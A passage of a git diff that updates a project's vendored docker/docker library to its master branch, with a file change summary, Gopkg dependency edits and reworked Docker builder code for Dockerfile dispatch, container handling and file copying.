vendor/github.com/docker/docker/plugin/manager_test.go rename vendor/github.com/docker/docker/project/{CONTRIBUTORS.md => CONTRIBUTING.md} (100%) delete mode 100644 vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md create mode 100644 vendor/github.com/docker/docker/reference/errors.go delete mode 100644 vendor/github.com/docker/docker/reference/reference.go delete mode 100644 vendor/github.com/docker/docker/reference/reference_test.go create mode 100644 vendor/github.com/docker/docker/registry/errors.go rename vendor/github.com/docker/docker/{pkg/httputils => registry/resumable}/resumablerequestreader.go (62%) rename vendor/github.com/docker/docker/{pkg/httputils => registry/resumable}/resumablerequestreader_test.go (68%) create mode 100644 vendor/github.com/docker/docker/reports/2017-05-01.md create mode 100644 vendor/github.com/docker/docker/reports/2017-05-08.md create mode 100644 vendor/github.com/docker/docker/reports/2017-05-15.md create mode 100644 vendor/github.com/docker/docker/reports/2017-06-05.md create mode 100644 vendor/github.com/docker/docker/reports/2017-06-12.md create mode 100644 vendor/github.com/docker/docker/reports/2017-06-26.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-01.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-08.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-15.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-22.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-29.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-05.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-12.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-26.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-07-10.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-07-17.md delete mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile_test.go delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts_test.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse_test.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/throttledevice.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/weightdevice.go delete mode 100644 vendor/github.com/docker/docker/utils/debug.go delete mode 100644 vendor/github.com/docker/docker/utils/process_windows.go delete mode 100644 vendor/github.com/docker/docker/utils/templates/templates.go delete mode 100644 vendor/github.com/docker/docker/utils/templates/templates_test.go delete mode 100644 vendor/github.com/docker/docker/utils/utils.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/lcow_parser.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/linux_parser.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/mounts.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/parser.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/parser_test.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/validate.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/validate_test.go rename vendor/github.com/docker/docker/volume/{validate_test_unix.go => mounts/validate_unix_test.go} (57%) rename vendor/github.com/docker/docker/volume/{validate_test_windows.go => mounts/validate_windows_test.go} (52%) rename vendor/github.com/docker/docker/volume/{ => mounts}/volume_copy.go (73%) create mode 100644 vendor/github.com/docker/docker/volume/mounts/volume_unix.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/volume_windows.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/windows_parser.go create mode 100644 vendor/github.com/docker/docker/volume/service/by.go create mode 100644 vendor/github.com/docker/docker/volume/service/convert.go rename vendor/github.com/docker/docker/volume/{store => service}/db.go (84%) create mode 100644 vendor/github.com/docker/docker/volume/service/db_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/default_driver.go create mode 100644 vendor/github.com/docker/docker/volume/service/default_driver_stubs.go rename vendor/github.com/docker/docker/volume/{store => service}/errors.go (65%) create mode 100644 vendor/github.com/docker/docker/volume/service/opts/opts.go rename vendor/github.com/docker/docker/volume/{store => service}/restore.go (85%) create mode 100644 vendor/github.com/docker/docker/volume/service/restore_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/service.go create mode 100644 vendor/github.com/docker/docker/volume/service/service_linux_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/service_test.go rename vendor/github.com/docker/docker/volume/{store => service}/store.go (51%) create mode 100644 vendor/github.com/docker/docker/volume/service/store_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/store_unix.go rename vendor/github.com/docker/docker/volume/{store => service}/store_windows.go (59%) delete mode 100644 vendor/github.com/docker/docker/volume/store/store_test.go delete mode 100644 vendor/github.com/docker/docker/volume/store/store_unix.go delete mode 100644 vendor/github.com/docker/docker/volume/validate.go delete mode 100644 vendor/github.com/docker/docker/volume/validate_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_copy_unix.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_copy_windows.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_linux.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_linux_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_unix.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_unsupported.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_windows.go diff --git a/Gopkg.lock b/Gopkg.lock index 08daf551c6..7ae9566a29 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -13,12 +13,6 @@ revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c" version = "v2.15.0" -[[projects]] - name = "github.com/Sirupsen/logrus" - packages = ["."] - revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc" - version = "v1.0.5" - [[projects]] name = "github.com/aokoli/goutils" packages = ["."] @@ -44,10 +38,10 @@ version = "v1.1.0" [[projects]] + branch = "master" name = "github.com/docker/docker" packages = ["pkg/fileutils"] - revision = "092cba3727bb9b4a2f0e922cd6c0f93ea270e363" - version = "v1.13.1" + revision = "e2593239d949eee454935daea7a5fe025477322f" [[projects]] branch = "master" @@ -254,6 +248,12 @@ revision = "645ef00459ed84a119197bfb8d8205042c6df63d" version = "v0.8.0" +[[projects]] + name = "github.com/sirupsen/logrus" + packages = ["."] + revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc" + version = "v1.0.5" + [[projects]] branch = "master" name = "github.com/spf13/afero" @@ -352,6 +352,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "41fa7bc4fc730240930807e113d19be175d2a8dfbca5cdf084e8285a3a150e43" + inputs-digest = "0afba7ec3d45c8cf6aea549a9ff30c674c2106f10c8f2865aee452376dcbfbe6" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 1d0d53b35e..38b0857452 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -98,5 +98,5 @@ name = "github.com/flynn-archive/go-shlex" [[constraint]] + branch = "master" name = "github.com/docker/docker" - version = "1.13.1" diff --git a/vendor/github.com/docker/docker/.DEREK.yml b/vendor/github.com/docker/docker/.DEREK.yml new file mode 100644 index 0000000000..3fd6789173 --- /dev/null +++ b/vendor/github.com/docker/docker/.DEREK.yml @@ -0,0 +1,17 @@ +curators: + - aboch + - alexellis + - andrewhsu + - anonymuse + - chanwit + - ehazlett + - fntlnz + - gianarb + - mgoelzer + - programmerq + - rheinwein + - ripcurld0 + - thajeztah + +features: + - comments diff --git a/vendor/github.com/docker/docker/.dockerignore b/vendor/github.com/docker/docker/.dockerignore index 082cac9224..4a56f2e00c 100644 --- a/vendor/github.com/docker/docker/.dockerignore +++ b/vendor/github.com/docker/docker/.dockerignore @@ -2,3 +2,6 @@ bundles .gopath vendor/pkg .go-pkg-cache +.git +hack/integration-cli-on-swarm/integration-cli-on-swarm + diff --git a/vendor/github.com/docker/docker/.github/CODEOWNERS b/vendor/github.com/docker/docker/.github/CODEOWNERS new file mode 100644 index 0000000000..9081854965 --- /dev/null +++ b/vendor/github.com/docker/docker/.github/CODEOWNERS @@ -0,0 +1,20 @@ +# GitHub code owners +# See https://help.github.com/articles/about-codeowners/ +# +# KEEP THIS FILE SORTED. Order is important. Last match takes precedence. + +builder/** @tonistiigi +client/** @dnephin +contrib/mkimage/** @tianon +daemon/graphdriver/devmapper/** @rhvgoyal +daemon/graphdriver/lcow/** @johnstep @jhowardmsft +daemon/graphdriver/overlay/** @dmcgowan +daemon/graphdriver/overlay2/** @dmcgowan +daemon/graphdriver/windows/** @johnstep @jhowardmsft +daemon/logger/awslogs/** @samuelkarp +hack/** @tianon +hack/integration-cli-on-swarm/** @AkihiroSuda +integration-cli/** @vdemeester +integration/** @vdemeester +plugin/** @cpuguy83 +project/** @thaJeztah diff --git a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md index 7362480a4a..64459e8b72 100644 --- a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md +++ b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md @@ -10,19 +10,25 @@ information within 7 days, we cannot debug your issue and will close it. We will, however, reopen it if you later provide the information. For more information about reporting issues, see -https://github.com/docker/docker/blob/master/CONTRIBUTING.md#reporting-other-issues +https://github.com/moby/moby/blob/master/CONTRIBUTING.md#reporting-other-issues --------------------------------------------------- GENERAL SUPPORT INFORMATION --------------------------------------------------- The GitHub issue tracker is for bug reports and feature requests. -General support can be found at the following locations: +General support for **docker** can be found at the following locations: - Docker Support Forums - https://forums.docker.com -- IRC - irc.freenode.net #docker channel +- Slack - community.docker.com #general channel - Post a question on StackOverflow, using the Docker tag +General support for **moby** can be found at the following locations: + +- Moby Project Forums - https://forums.mobyproject.org +- Slack - community.docker.com #moby-project channel +- Post a question on StackOverflow, using the Moby tag + --------------------------------------------------- BUG REPORT INFORMATION --------------------------------------------------- diff --git a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md index 426981828b..fad7555d77 100644 --- a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md +++ b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md @@ -1,6 +1,6 @@ %s\n", shortImgID) - if b.options.Remove { - b.clearTmp() - } + dockerfile.PrintWarnings(b.Stderr) + dispatchState, err := b.dispatchDockerfileWithCancellation(stages, metaArgs, dockerfile.EscapeToken, source) + if err != nil { + return nil, err + } + if dispatchState.imageID == "" { + buildsFailed.WithValues(metricsDockerfileEmptyError).Inc() + return nil, errors.New("No image was generated. Is your Dockerfile empty?") } + return &builder.Result{ImageID: dispatchState.imageID, FromImage: dispatchState.baseImage}, nil +} - // check if there are any leftover build-args that were passed but not - // consumed during build. Return a warning, if there are any. - leftoverArgs := []string{} - for arg := range b.options.BuildArgs { - if !b.isBuildArgAllowed(arg) { - leftoverArgs = append(leftoverArgs, arg) - } +func emitImageID(aux *streamformatter.AuxFormatter, state *dispatchState) error { + if aux == nil || state.imageID == "" { + return nil } + return aux.Emit(types.BuildResult{ID: state.imageID}) +} - if len(leftoverArgs) > 0 { - fmt.Fprintf(b.Stderr, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs) +func processMetaArg(meta instructions.ArgCommand, shlex *shell.Lex, args *BuildArgs) error { + // shell.Lex currently only support the concatenated string format + envs := convertMapToEnvList(args.GetAllAllowed()) + if err := meta.Expand(func(word string) (string, error) { + return shlex.ProcessWord(word, envs) + }); err != nil { + return err } + args.AddArg(meta.Key, meta.Value) + args.AddMetaArg(meta.Key, meta.Value) + return nil +} - if b.image == "" { - return "", fmt.Errorf("No image was generated. Is your Dockerfile empty?") +func printCommand(out io.Writer, currentCommandIndex int, totalCommands int, cmd interface{}) int { + fmt.Fprintf(out, stepFormat, currentCommandIndex, totalCommands, cmd) + fmt.Fprintln(out) + return currentCommandIndex + 1 +} + +func (b *Builder) dispatchDockerfileWithCancellation(parseResult []instructions.Stage, metaArgs []instructions.ArgCommand, escapeToken rune, source builder.Source) (*dispatchState, error) { + dispatchRequest := dispatchRequest{} + buildArgs := NewBuildArgs(b.options.BuildArgs) + totalCommands := len(metaArgs) + len(parseResult) + currentCommandIndex := 1 + for _, stage := range parseResult { + totalCommands += len(stage.Commands) } + shlex := shell.NewLex(escapeToken) + for _, meta := range metaArgs { + currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, &meta) - if b.options.Squash { - var fromID string - if b.from != nil { - fromID = b.from.ImageID() - } - b.image, err = b.docker.SquashImage(b.image, fromID) + err := processMetaArg(meta, shlex, buildArgs) if err != nil { - return "", perrors.Wrap(err, "error squashing image") + return nil, err } } - imageID := image.ID(b.image) - for _, rt := range repoAndTags { - if err := b.docker.TagImageWithReference(imageID, rt); err != nil { - return "", err + stagesResults := newStagesBuildResults() + + for _, stage := range parseResult { + if err := stagesResults.checkStageNameAvailable(stage.Name); err != nil { + return nil, err } - } + dispatchRequest = newDispatchRequest(b, escapeToken, source, buildArgs, stagesResults) - fmt.Fprintf(b.Stdout, "Successfully built %s\n", shortImgID) - return b.image, nil -} + currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, stage.SourceCode) + if err := initializeStage(dispatchRequest, &stage); err != nil { + return nil, err + } + dispatchRequest.state.updateRunConfig() + fmt.Fprintf(b.Stdout, " ---> %s\n", stringid.TruncateID(dispatchRequest.state.imageID)) + for _, cmd := range stage.Commands { + select { + case <-b.clientCtx.Done(): + logrus.Debug("Builder: build cancelled!") + fmt.Fprint(b.Stdout, "Build cancelled\n") + buildsFailed.WithValues(metricsBuildCanceled).Inc() + return nil, errors.New("Build cancelled") + default: + // Not cancelled yet, keep going... + } -// Cancel cancels an ongoing Dockerfile build. -func (b *Builder) Cancel() { - b.cancel() + currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, cmd) + + if err := dispatch(dispatchRequest, cmd); err != nil { + return nil, err + } + dispatchRequest.state.updateRunConfig() + fmt.Fprintf(b.Stdout, " ---> %s\n", stringid.TruncateID(dispatchRequest.state.imageID)) + + } + if err := emitImageID(b.Aux, dispatchRequest.state); err != nil { + return nil, err + } + buildArgs.MergeReferencedArgs(dispatchRequest.state.buildArgs) + if err := commitStage(dispatchRequest.state, stagesResults); err != nil { + return nil, err + } + } + buildArgs.WarnOnUnusedBuildArgs(b.Stdout) + return dispatchRequest.state, nil } // BuildFromConfig builds directly from `changes`, treating it as if it were the contents of a Dockerfile @@ -330,41 +359,63 @@ func (b *Builder) Cancel() { // coming from the query parameter of the same name. // // TODO: Remove? -func BuildFromConfig(config *container.Config, changes []string) (*container.Config, error) { - b, err := NewBuilder(context.Background(), nil, nil, nil, nil) - if err != nil { - return nil, err +func BuildFromConfig(config *container.Config, changes []string, os string) (*container.Config, error) { + if !system.IsOSSupported(os) { + return nil, errdefs.InvalidParameter(system.ErrNotSupportedOperatingSystem) + } + if len(changes) == 0 { + return config, nil } - ast, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")), &b.directive) + dockerfile, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n"))) if err != nil { - return nil, err + return nil, errdefs.InvalidParameter(err) } + b := newBuilder(context.Background(), builderOptions{ + Options: &types.ImageBuildOptions{NoCache: true}, + }) + // ensure that the commands are valid - for _, n := range ast.Children { + for _, n := range dockerfile.AST.Children { if !validCommitCommands[n.Value] { - return nil, fmt.Errorf("%s is not a valid change command", n.Value) + return nil, errdefs.InvalidParameter(errors.Errorf("%s is not a valid change command", n.Value)) } } - b.runConfig = config b.Stdout = ioutil.Discard b.Stderr = ioutil.Discard b.disableCommit = true - total := len(ast.Children) - for _, n := range ast.Children { - if err := b.checkDispatch(n, false); err != nil { - return nil, err + var commands []instructions.Command + for _, n := range dockerfile.AST.Children { + cmd, err := instructions.ParseCommand(n) + if err != nil { + return nil, errdefs.InvalidParameter(err) } + commands = append(commands, cmd) } - for i, n := range ast.Children { - if err := b.dispatch(i, total, n); err != nil { - return nil, err + dispatchRequest := newDispatchRequest(b, dockerfile.EscapeToken, nil, NewBuildArgs(b.options.BuildArgs), newStagesBuildResults()) + // We make mutations to the configuration, ensure we have a copy + dispatchRequest.state.runConfig = copyRunConfig(config) + dispatchRequest.state.imageID = config.Image + dispatchRequest.state.operatingSystem = os + for _, cmd := range commands { + err := dispatch(dispatchRequest, cmd) + if err != nil { + return nil, errdefs.InvalidParameter(err) } + dispatchRequest.state.updateRunConfig() } - return b.runConfig, nil + return dispatchRequest.state.runConfig, nil +} + +func convertMapToEnvList(m map[string]string) []string { + result := []string{} + for k, v := range m { + result = append(result, k+"="+v) + } + return result } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go index 76a7ce74f9..c4453459b3 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go @@ -1,5 +1,7 @@ // +build !windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -var defaultShell = []string{"/bin/sh", "-c"} +func defaultShellForOS(os string) []string { + return []string{"/bin/sh", "-c"} +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go index 37e9fbcf4b..fbafa52aec 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go @@ -1,3 +1,8 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -var defaultShell = []string{"cmd", "/S", "/C"} +func defaultShellForOS(os string) []string { + if os == "linux" { + return []string{"/bin/sh", "-c"} + } + return []string{"cmd", "/S", "/C"} +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go b/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go new file mode 100644 index 0000000000..b48090d7b5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go @@ -0,0 +1,76 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "time" + + "github.com/docker/docker/builder/fscache" + "github.com/docker/docker/builder/remotecontext" + "github.com/moby/buildkit/session" + "github.com/moby/buildkit/session/filesync" + "github.com/pkg/errors" +) + +const sessionConnectTimeout = 5 * time.Second + +// ClientSessionTransport is a transport for copying files from docker client +// to the daemon. +type ClientSessionTransport struct{} + +// NewClientSessionTransport returns new ClientSessionTransport instance +func NewClientSessionTransport() *ClientSessionTransport { + return &ClientSessionTransport{} +} + +// Copy data from a remote to a destination directory. +func (cst *ClientSessionTransport) Copy(ctx context.Context, id fscache.RemoteIdentifier, dest string, cu filesync.CacheUpdater) error { + csi, ok := id.(*ClientSessionSourceIdentifier) + if !ok { + return errors.New("invalid identifier for client session") + } + + return filesync.FSSync(ctx, csi.caller, filesync.FSSendRequestOpt{ + IncludePatterns: csi.includePatterns, + DestDir: dest, + CacheUpdater: cu, + }) +} + +// ClientSessionSourceIdentifier is an identifier that can be used for requesting +// files from remote client +type ClientSessionSourceIdentifier struct { + includePatterns []string + caller session.Caller + uuid string +} + +// NewClientSessionSourceIdentifier returns new ClientSessionSourceIdentifier instance +func NewClientSessionSourceIdentifier(ctx context.Context, sg SessionGetter, uuid string) (*ClientSessionSourceIdentifier, error) { + csi := &ClientSessionSourceIdentifier{ + uuid: uuid, + } + caller, err := sg.Get(ctx, uuid) + if err != nil { + return nil, errors.Wrapf(err, "failed to get session for %s", uuid) + } + + csi.caller = caller + return csi, nil +} + +// Transport returns transport identifier for remote identifier +func (csi *ClientSessionSourceIdentifier) Transport() string { + return remotecontext.ClientSessionRemote +} + +// SharedKey returns shared key for remote identifier. Shared key is used +// for finding the base for a repeated transfer. +func (csi *ClientSessionSourceIdentifier) SharedKey() string { + return csi.caller.SharedKey() +} + +// Key returns unique key for remote identifier. Requests with same key return +// same data. +func (csi *ClientSessionSourceIdentifier) Key() string { + return csi.uuid +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go deleted file mode 100644 index f23c6874b5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go +++ /dev/null @@ -1,46 +0,0 @@ -// Package command contains the set of Dockerfile commands. -package command - -// Define constants for the command strings -const ( - Add = "add" - Arg = "arg" - Cmd = "cmd" - Copy = "copy" - Entrypoint = "entrypoint" - Env = "env" - Expose = "expose" - From = "from" - Healthcheck = "healthcheck" - Label = "label" - Maintainer = "maintainer" - Onbuild = "onbuild" - Run = "run" - Shell = "shell" - StopSignal = "stopsignal" - User = "user" - Volume = "volume" - Workdir = "workdir" -) - -// Commands is list of all Dockerfile commands -var Commands = map[string]struct{}{ - Add: {}, - Arg: {}, - Cmd: {}, - Copy: {}, - Entrypoint: {}, - Env: {}, - Expose: {}, - From: {}, - Healthcheck: {}, - Label: {}, - Maintainer: {}, - Onbuild: {}, - Run: {}, - Shell: {}, - StopSignal: {}, - User: {}, - Volume: {}, - Workdir: {}, -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go b/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go new file mode 100644 index 0000000000..54adfb13f7 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go @@ -0,0 +1,146 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "fmt" + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/pkg/stringid" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type containerManager struct { + tmpContainers map[string]struct{} + backend builder.ExecBackend +} + +// newContainerManager creates a new container backend +func newContainerManager(docker builder.ExecBackend) *containerManager { + return &containerManager{ + backend: docker, + tmpContainers: make(map[string]struct{}), + } +} + +// Create a container +func (c *containerManager) Create(runConfig *container.Config, hostConfig *container.HostConfig) (container.ContainerCreateCreatedBody, error) { + container, err := c.backend.ContainerCreate(types.ContainerCreateConfig{ + Config: runConfig, + HostConfig: hostConfig, + }) + if err != nil { + return container, err + } + c.tmpContainers[container.ID] = struct{}{} + return container, nil +} + +var errCancelled = errors.New("build cancelled") + +// Run a container by ID +func (c *containerManager) Run(ctx context.Context, cID string, stdout, stderr io.Writer) (err error) { + attached := make(chan struct{}) + errCh := make(chan error) + go func() { + errCh <- c.backend.ContainerAttachRaw(cID, nil, stdout, stderr, true, attached) + }() + select { + case err := <-errCh: + return err + case <-attached: + } + + finished := make(chan struct{}) + cancelErrCh := make(chan error, 1) + go func() { + select { + case <-ctx.Done(): + logrus.Debugln("Build cancelled, killing and removing container:", cID) + c.backend.ContainerKill(cID, 0) + c.removeContainer(cID, stdout) + cancelErrCh <- errCancelled + case <-finished: + cancelErrCh <- nil + } + }() + + if err := c.backend.ContainerStart(cID, nil, "", ""); err != nil { + close(finished) + logCancellationError(cancelErrCh, "error from ContainerStart: "+err.Error()) + return err + } + + // Block on reading output from container, stop on err or chan closed + if err := <-errCh; err != nil { + close(finished) + logCancellationError(cancelErrCh, "error from errCh: "+err.Error()) + return err + } + + waitC, err := c.backend.ContainerWait(ctx, cID, containerpkg.WaitConditionNotRunning) + if err != nil { + close(finished) + logCancellationError(cancelErrCh, fmt.Sprintf("unable to begin ContainerWait: %s", err)) + return err + } + + if status := <-waitC; status.ExitCode() != 0 { + close(finished) + logCancellationError(cancelErrCh, + fmt.Sprintf("a non-zero code from ContainerWait: %d", status.ExitCode())) + return &statusCodeError{code: status.ExitCode(), err: status.Err()} + } + + close(finished) + return <-cancelErrCh +} + +func logCancellationError(cancelErrCh chan error, msg string) { + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v): %s", cancelErr, msg) + } +} + +type statusCodeError struct { + code int + err error +} + +func (e *statusCodeError) Error() string { + if e.err == nil { + return "" + } + return e.err.Error() +} + +func (e *statusCodeError) StatusCode() int { + return e.code +} + +func (c *containerManager) removeContainer(containerID string, stdout io.Writer) error { + rmConfig := &types.ContainerRmConfig{ + ForceRemove: true, + RemoveVolume: true, + } + if err := c.backend.ContainerRm(containerID, rmConfig); err != nil { + fmt.Fprintf(stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(containerID), err) + return err + } + return nil +} + +// RemoveAll containers managed by this container manager +func (c *containerManager) RemoveAll(stdout io.Writer) { + for containerID := range c.tmpContainers { + if err := c.removeContainer(containerID, stdout); err != nil { + return + } + delete(c.tmpContainers, containerID) + fmt.Fprintf(stdout, "Removing intermediate container %s\n", stringid.TruncateID(containerID)) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy.go b/vendor/github.com/docker/docker/builder/dockerfile/copy.go new file mode 100644 index 0000000000..43f40b62f9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy.go @@ -0,0 +1,560 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "archive/tar" + "fmt" + "io" + "mime" + "net/http" + "net/url" + "os" + "path/filepath" + "runtime" + "sort" + "strings" + "time" + + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/urlutil" + "github.com/pkg/errors" +) + +const unnamedFilename = "__unnamed__" + +type pathCache interface { + Load(key interface{}) (value interface{}, ok bool) + Store(key, value interface{}) +} + +// copyInfo is a data object which stores the metadata about each source file in +// a copyInstruction +type copyInfo struct { + root containerfs.ContainerFS + path string + hash string + noDecompress bool +} + +func (c copyInfo) fullPath() (string, error) { + return c.root.ResolveScopedPath(c.path, true) +} + +func newCopyInfoFromSource(source builder.Source, path string, hash string) copyInfo { + return copyInfo{root: source.Root(), path: path, hash: hash} +} + +func newCopyInfos(copyInfos ...copyInfo) []copyInfo { + return copyInfos +} + +// copyInstruction is a fully parsed COPY or ADD command that is passed to +// Builder.performCopy to copy files into the image filesystem +type copyInstruction struct { + cmdName string + infos []copyInfo + dest string + chownStr string + allowLocalDecompression bool +} + +// copier reads a raw COPY or ADD command, fetches remote sources using a downloader, +// and creates a copyInstruction +type copier struct { + imageSource *imageMount + source builder.Source + pathCache pathCache + download sourceDownloader + platform string + // for cleanup. TODO: having copier.cleanup() is error prone and hard to + // follow. Code calling performCopy should manage the lifecycle of its params. + // Copier should take override source as input, not imageMount. + activeLayer builder.RWLayer + tmpPaths []string +} + +func copierFromDispatchRequest(req dispatchRequest, download sourceDownloader, imageSource *imageMount) copier { + return copier{ + source: req.source, + pathCache: req.builder.pathCache, + download: download, + imageSource: imageSource, + platform: req.builder.options.Platform, + } +} + +func (o *copier) createCopyInstruction(args []string, cmdName string) (copyInstruction, error) { + inst := copyInstruction{cmdName: cmdName} + last := len(args) - 1 + + // Work in platform-specific filepath semantics + inst.dest = fromSlash(args[last], o.platform) + separator := string(separator(o.platform)) + infos, err := o.getCopyInfosForSourcePaths(args[0:last], inst.dest) + if err != nil { + return inst, errors.Wrapf(err, "%s failed", cmdName) + } + if len(infos) > 1 && !strings.HasSuffix(inst.dest, separator) { + return inst, errors.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName) + } + inst.infos = infos + return inst, nil +} + +// getCopyInfosForSourcePaths iterates over the source files and calculate the info +// needed to copy (e.g. hash value if cached) +// The dest is used in case source is URL (and ends with "/") +func (o *copier) getCopyInfosForSourcePaths(sources []string, dest string) ([]copyInfo, error) { + var infos []copyInfo + for _, orig := range sources { + subinfos, err := o.getCopyInfoForSourcePath(orig, dest) + if err != nil { + return nil, err + } + infos = append(infos, subinfos...) + } + + if len(infos) == 0 { + return nil, errors.New("no source files were specified") + } + return infos, nil +} + +func (o *copier) getCopyInfoForSourcePath(orig, dest string) ([]copyInfo, error) { + if !urlutil.IsURL(orig) { + return o.calcCopyInfo(orig, true) + } + + remote, path, err := o.download(orig) + if err != nil { + return nil, err + } + // If path == "" then we are unable to determine filename from src + // We have to make sure dest is available + if path == "" { + if strings.HasSuffix(dest, "/") { + return nil, errors.Errorf("cannot determine filename for source %s", orig) + } + path = unnamedFilename + } + o.tmpPaths = append(o.tmpPaths, remote.Root().Path()) + + hash, err := remote.Hash(path) + ci := newCopyInfoFromSource(remote, path, hash) + ci.noDecompress = true // data from http shouldn't be extracted even on ADD + return newCopyInfos(ci), err +} + +// Cleanup removes any temporary directories created as part of downloading +// remote files. +func (o *copier) Cleanup() { + for _, path := range o.tmpPaths { + os.RemoveAll(path) + } + o.tmpPaths = 